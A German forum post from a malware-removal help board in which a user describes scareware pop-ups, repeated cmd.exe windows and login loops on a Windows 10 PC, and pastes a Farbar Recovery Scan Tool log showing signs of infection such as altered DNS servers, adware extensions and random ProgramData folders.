Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: cmd.exe spam nach hochfahren von Windows 10

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 03.01.2018, 23:37   #1
ViperGaming
 
cmd.exe spam nach hochfahren von Windows 10 - Standard

cmd.exe spam nach hochfahren von Windows 10



Hallo,

ich bin neu und dies ist der erste Forenpost den ich je geschrieben habe. Bitte seid nachsichtig mit mir. Ich habe mir nachdem ich mit meinem Arbeitscomputer Probleme hatte auf den Wunsch meines Vorgesetzten das Programm "Blackboard" auf meinem Privat PC heruntergeladen um wenigstens meinen Kollegen mit Rat und Tat zur seite zu stehen, was sich nachträglich als anscheinend nicht sehr klug herausstelle.

Schon vorher hatte ich einige kleinere Probleme, welche ich allerdings der Bequemlichkeithalber (vermutlich) gekonnt ignoriert hatte, weil sie auf meine Nutzung keinen (signifikanten) Einfluss hatten; aber nun zu meinem Problem:

Vor ca. 3 Wochen fing es an, dass sich in meinem Firefox während der Nutzung seperate Popupfenster öffneten, welche mich entweder mit billigaufgesetzten Sprachmitteilungen baten mich aufgrund des mehrfach wiederholten "Microsoft Sicherheitsalarms" an den im Pop up angezeigten Link zu wenden, da sonst alle meine Daten aus Sicherheitsgründen gelöscht würden. Welche ich genervt mit dem Taskmanager (da sie sich anderweitig nicht schließen ließen) abgewürgt habe.

Anschließend vor ca. 2 1/2 Wochen meldete sich in penetranter Manier mein Windows Defender (von dem ich nichtmal weiß, ob er ein legitimes Programm ist) mit der Meldung dass in Benutzer/SYSTEM32 irgendwas geblockt wurde, was ich allerdings aufgrund mangelnden Wissens weder unterbinden noch ruhigstellen konnte. die Frequenz dieser Meldung war geschätzt in 4 Stunden am PC ca. 20-30x in der Regel, aber ich fand mich damit ab.

All das passierte schon bevor ich das Programm Blackboard heute heruntergeladen habe. Allerdings habe ich seitdem ich hiernach den PC das erste mal herunterfuhr das Problem, dass sich nach Start des PCs die cmd.exe unendlich oft öffnet und meinen PC (der technisch meiner Meinung nach relativ weit vorne mitspielt in Sachen Leistung für einen casual user) ziemlich zum laggen bringt. Während ich diesen Post schreibe fällt mir auf, dass der cmd-spam sich anscheinend beruhigt hat, was mich allerdings nur ein wenig beruhigt, da auch das Hochfahren einige tücken mit sich bringt seit heute:

Wenn ich nach dem cmd-spam den PC ausschaltete um ihn neu zu starten in der Hoffnung es handele sich um einen Bootfehler kam es während des Hochfahrens zu einem Blackscreen (ca 1-2min) den ich von meinem PC, welcher für gewöhnlich 5-7sek braucht bis zum loginscreen, bis dato nicht kannte. Nachdem dieser Blackscreen weg war, kam ich im loginscreen raus, konnte mein Passwort eingeben, welches nach dem "entern" erneut zu einem blackscreen wurde und darin endete, dass ich wieder im loginscreen landete.

Anbei copy+paste ich die FRST Daten, welche ich eben eingeholt habe in der Hoffnung, dass mir jemand von euch helfen kann.



FRST.txt

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02.01.2018
durchgeführt von Gaming (Administrator) auf BEASTYBABY (03-01-2018 23:03:20)
Gestartet von C:\Users\Gaming\Downloads
Geladene Profile: Gaming (Verfügbare Profile: Gaming)
Platform: Windows 10 Home Version 1709 16299.125 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\iMController\Service\Lenovo.Modern.ImController.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Intel(R) Corporation) C:\Program Files\Intel\Intel(R) Online Connect Access\LegacyCsLoaderService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\LenovoPortal\FastBoot\FbService.exe
(Intel(R) Corporation) C:\Program Files\Intel\Intel(R) Online Connect Access\IntelTechnologyAccessService.exe
() C:\Windows\jmesoft\Service.exe
() C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\MsMpEng.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\NisSrv.exe
(Dolby Laboratories Inc.) C:\Program Files\Dolby Digital Plus\ddp.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.SettingsApp.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe
(Lenovo) C:\Windows\jmesoft\hotkey.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
() C:\Windows\jmesoft\JME_LOAD.exe
(CyberLink Corp.) C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe
(Lenovo) C:\Program Files\Lenovo\QuickOptimizer\QuickOptimizerIcon.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Online Connect\ioc.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.16299.96_none_2c40cc7f3876f2b7\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
() C:\Users\Gaming\AppData\Local\Temp\304959e
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [630168 2017-09-29] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16404224 2015-08-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1404656 2015-08-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_LENOVO_MICPKEY] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1404656 2015-08-20] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [297784 2017-10-20] (Apple Inc.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-04] (CyberLink)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06] (CyberLink Corp.)
HKLM-x32\...\Run: [jmekey] => C:\Windows\jmesoft\hotkey.exe [118784 2013-07-24] (Lenovo)
HKLM-x32\...\Run: [jmesoft] => C:\Windows\jmesoft\ServiceLoader.exe [28672 2011-08-16] ()
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [596640 2016-11-04] (Razer Inc.)
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3111712 2017-12-15] (Valve Corporation)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: 0.0.0.0 csgob0t.online
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{785ab377-5c5f-4d1b-a820-2743c7793b8d}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{785ab377-5c5f-4d1b-a820-2743c7793b8d}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{936d8488-b7d6-4840-9bc8-e607fc557deb}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{936d8488-b7d6-4840-9bc8-e607fc557deb}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{99292c3a-6611-42e2-801c-65815ebedc8a}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{99292c3a-6611-42e2-801c-65815ebedc8a}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{fd23b6b3-1c4f-4112-9481-01868bd8e93c}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{fd23b6b3-1c4f-4112-9481-01868bd8e93c}: [DhcpNameServer] 82.163.143.176

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131184788764431222&GUID=FBCDB6FE-CB0A-4078-821C-0021947F152D
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D092617-AE5EBDDD906&form=CONMHP&conlogo=CT3335827
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo15.msn.com/?pc=LCTE
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/de-de/?ocid=iehp
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.lenovo.com
SearchScopes: HKLM -> DefaultScope {DC21A845-4A67-4000-945C-AD8BC3FC7E89} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {DC21A845-4A67-4000-945C-AD8BC3FC7E89} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001 -> DefaultScope {DC21A845-4A67-4000-945C-AD8BC3FC7E89} URL =
SearchScopes: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001 -> OldSearch URL =
SearchScopes: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D092617-AE5EBDDD906&form=CONBDF&conlogo=CT3335827&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5bVAgQFgRAbQgKUwlcFQdBJRRaAA8SDFYRcQxZVVgSEgATch9aFQQTSEcFME0FCFwEURNNfXpZD10dRH9CMg==&q={searchTerms}
BHO-x32: Candle Jar -> {10bdb19e-8d73-42cf-81d3-8d5a9021cb3a} -> C:\Program Files (x86)\Candle Jar\Extensions\10bdb19e-8d73-42cf-81d3-8d5a9021cb3a.dll => Keine Datei

FireFox:
========
FF DefaultProfile: t9denw2v.default
FF ProfilePath: C:\Users\Gaming\AppData\Roaming\Mozilla\Firefox\Profiles\t9denw2v.default [2018-01-03]
FF Homepage: Mozilla\Firefox\Profiles\t9denw2v.default -> hxxp://www.google.de/
FF NewTab: Mozilla\Firefox\Profiles\t9denw2v.default -> hxxp://www.bing.com/?pc=COSP&ptag=D092617-AE5EBDDD906&form=CONMHP&conlogo=CT3335827
FF Extension: (Candle Jar) - C:\Users\Gaming\AppData\Roaming\Mozilla\Firefox\Profiles\t9denw2v.default\Extensions\{86407da6-876a-4fbf-850f-395b02affcb8}.xpi [2015-12-07] [Legacy] [ist nicht signiert]
FF Extension: (Search Quick Know) - C:\Users\Gaming\AppData\Roaming\Mozilla\Firefox\Profiles\t9denw2v.default\Extensions\{c18852ce-0629-4f67-9f55-6ba471607586}.xpi [2015-12-07] [Legacy] [ist nicht signiert]
FF SearchPlugin: C:\Users\Gaming\AppData\Roaming\Mozilla\Firefox\Profiles\t9denw2v.default\searchplugins\bing-lavasoft.xml [2017-09-26]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-10-11] (Apple Inc.)
R2 FastbootService; C:\Program Files (x86)\Lenovo\LenovoPortal\FastBoot\FbService.exe [288768 2015-10-29] (Lenovo) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [68408 2017-11-12] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [987432 2016-07-26] (Intel(R) Corporation)
R3 Intel(R) Online Connect; C:\Program Files\Intel\Intel(R) Online Connect\ioc.exe [25824 2016-10-04] (Intel Corporation)
S2 Intel(R) Online Connect Helper; C:\Program Files\Intel\Intel(R) Online Connect\iocHelperService.exe [22752 2016-10-04] (Intel Corporation)
S3 Intel(R) Online Connect Software Asset Manager; C:\Program Files (x86)\Intel\Intel(R) Online Connect Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [18152 2016-09-29] (Intel Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Datei ist nicht signiert]
R2 Intel(R) TechnologyAccessLegacyCSLoader; C:\Program Files\Intel\Intel(R) Online Connect Access\LegacyCsLoaderService.exe [173288 2016-10-05] (Intel(R) Corporation)
R2 Intel(R) TechnologyAccessService; C:\Program Files\Intel\Intel(R) Online Connect Access\IntelTechnologyAccessService.exe [496872 2016-10-05] (Intel(R) Corporation)
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [177440 2016-10-20] (Intel Corporation)
R2 JME Keyboard; C:\Windows\jmesoft\Service.exe [32768 2011-08-16] () [Datei ist nicht signiert]
R2 LenovoPortalService; C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe [24312 2015-10-29] ()
S3 LSCWinService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCWinService.exe [271296 2015-07-01] (Lenovo)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [69744 2016-10-18] (Razer Inc.)
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\NisSrv.exe [356176 2017-12-07] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MsMpEng.exe [105792 2017-12-07] (Microsoft Corporation)
S2 DesktopMediaService; "C:\Program Files\jetstrmedia\NetMedia\desktop_media_service.exe" --service [X]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 Fastboot; C:\WINDOWS\System32\DRIVERS\Fastboot.sys [67608 2015-10-29] (Windows (R) Win 7 DDK provider) [Datei ist nicht signiert]
R0 FBFsmon; C:\WINDOWS\System32\DRIVERS\FBFsmon.sys [39448 2015-10-29] (Windows (R) Win 7 DDK provider) [Datei ist nicht signiert]
S3 ldiagio_uefi; C:\Program Files\Lenovo\Lenovo Solution Center\App\ldiag\x64\ldiagio_uefi.sys [24808 2015-04-01] (Lenovo Group Limited (R))
R1 ndisrd; C:\WINDOWS\system32\DRIVERS\ndisrfl.sys [59792 2016-09-13] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvle.inf_amd64_fab4bf6109a29a2d\nvlddmkm.sys [14482328 2017-06-23] (NVIDIA Corporation)
S3 Qcamain; C:\WINDOWS\System32\drivers\Qcamainx64.sys [2276352 2015-07-10] (Qualcomm Atheros, Inc.) [Datei ist nicht signiert]
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [411712 2015-05-19] (Realsil Semiconductor Corporation)
R3 rzendpt; C:\WINDOWS\System32\drivers\rzendpt.sys [50392 2015-10-26] (Razer Inc)
R3 rzmpos; C:\WINDOWS\System32\drivers\rzmpos.sys [47312 2015-10-26] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [137840 2016-10-08] (Razer, Inc.)
R3 sshid; C:\WINDOWS\System32\drivers\sshid.sys [52952 2016-08-29] (SteelSeries ApS)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46072 2017-12-07] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [288848 2017-12-07] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [129616 2017-12-07] (Microsoft Corporation)
S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)
R3 YLED; C:\WINDOWS\System32\drivers\YLED.sys [25336 2015-07-11] ()

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2018-01-03 23:03 - 2018-01-03 23:03 - 000016687 _____ C:\Users\Gaming\Downloads\FRST.txt
2018-01-03 23:03 - 2018-01-03 23:03 - 000004184 _____ C:\WINDOWS\System32\Tasks\{5B4DEF7C-ECE6-58D7-898F-893A353C76AD}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-5947-0
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-3dd3-0
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-3dc1-0
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-0cd3-0
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-0231-0
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{CBBD5292-7C16-E539-EE3A-FF3C4E7FB624}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{C144597D-76EF-EED6-017B-7FDC4BBF907F}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{B9BAF6E1-0E11-414A-6D98-C19C4B4544A3}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{7368B3D4-C4C3-047F-615B-EA2B47E97730}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{16454A23-A1EE-FD88-571A-164CE8F903AF}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{088F6A56-BF24-DDFD-1127-F60ABBF039E7}
2018-01-03 23:03 - 2018-01-03 23:03 - 000000000 ____D C:\FRST
2018-01-03 23:02 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-7ae3-0
2018-01-03 23:02 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-3d65-0
2018-01-03 23:02 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-0895-0
2018-01-03 23:02 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\d7031301-05f7-0
2018-01-03 23:02 - 2018-01-03 23:03 - 000000000 ____D C:\ProgramData\{4104C798-F6AF-7033-2369-00C3D5BF2471}
2018-01-03 23:02 - 2018-01-03 23:02 - 002393088 _____ (Farbar) C:\Users\Gaming\Downloads\FRST64.exe
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-6811-0
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-5427-0
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-4c47-0
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{E56F4922-52C4-FE89-FBD6-CD3C9844B93B}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{A25DBF97-15F6-083C-B43D-108C7F127001}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{9F78E7D7-28D3-507C-9460-4140DD6A789F}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{882FD034-3F84-679F-E081-8E12913DBF2D}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{81403435-36EB-839E-F9F1-5E93CB069D8B}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{756CC947-C2C7-7EEC-BA86-0D78E235E919}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{632CA6CD-D487-1166-9012-A31BBE48BA86}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{5752824E-E0F9-35E5-6E9F-3966C2F1DDF7}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{4C1414C7-FBBF-A36C-8886-EF5862CCEFEC}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{3AABDCB9-8D00-6B12-04BD-18D36F6224F3}
2018-01-03 23:02 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{241B2F77-93B0-98DC-A628-EA04B9905DE0}
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-7cb7-0
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-63f5-0
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-5ce1-0
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-4515-0
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-4303-0
2018-01-03 23:01 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\{99B91DE7-2E12-AA4C-1BC3-19FDA14E44A5}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{F5E88FCB-4243-3860-4BBB-8FAFDB1ED33C}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{F2BE8D62-4515-3AC9-A86C-9C79C4FA6D8A}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{EEDAFD13-5971-4AB8-63E7-67C51750ABD7}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{B8714D52-0FDA-FAF9-F763-BD9FCDAFAC2D}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{97C7E65E-206C-51F5-00FE-3BF33B03E00B}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{6A1377C5-DDB8-C06E-6D9B-552D3CDDA44D}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{6026A205-D78D-15AE-527E-569205856FAD}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{5C0FA64D-EBA4-11E6-E9D0-3854D14426B7}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{493071C4-FE9B-C66F-7575-4D6836A177FF}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{461B2527-F1B0-928C-CCAC-BF5F085C71C9}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{4072F5AB-F7D9-4200-F7E0-27BA650CD1B3}
2018-01-03 23:01 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{031BA2AC-B4B0-1507-EA9A-42838A5C3F9E}
2018-01-03 23:00 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-6573-0
2018-01-03 23:00 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-62d1-0
2018-01-03 23:00 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-3b25-0
2018-01-03 23:00 - 2018-01-03 23:02 - 000000000 ____D C:\ProgramData\d7031301-3295-0
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-7be3-0
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-7987-0
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-70a5-1
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-3515-0
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-2593-0
